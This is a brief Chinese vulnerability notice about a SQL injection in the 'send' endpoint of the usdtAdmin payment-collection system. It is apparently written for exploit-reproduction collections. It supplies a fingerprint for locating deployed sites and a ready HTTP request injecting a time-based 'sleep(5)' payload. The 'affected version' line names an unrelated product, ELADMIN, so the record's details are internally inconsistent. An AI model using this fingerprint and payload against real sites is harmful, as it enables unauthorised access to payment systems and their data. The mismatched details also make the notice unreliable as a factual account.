usdtAdmin收款管理系统send存在SQL注入漏洞
一、漏洞简介
usdtAdmin收款管理系统于ThinkPHP6,专注于以太坊与稳定币后台管理系统开发,超过100万个网站使用usdtAdmin建站系统进行收款对接。我们的服务包括:区块链钱包开发、游戏支付、NFT游戏、政府网站建设,usdtAdmin网站系统本着以客户为本、务实创新的理念,助力广大中小公司企业网络营销推广,实现多方共赢。usdtAdmin收款管理系统send存在SQL注入漏洞
二、影响版本
- ELADMIN
三、资产测绘
"/usdtmerchant/login/reg.html"
四、漏洞复现
GET /index/index/send?query=select%20sleep(5) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15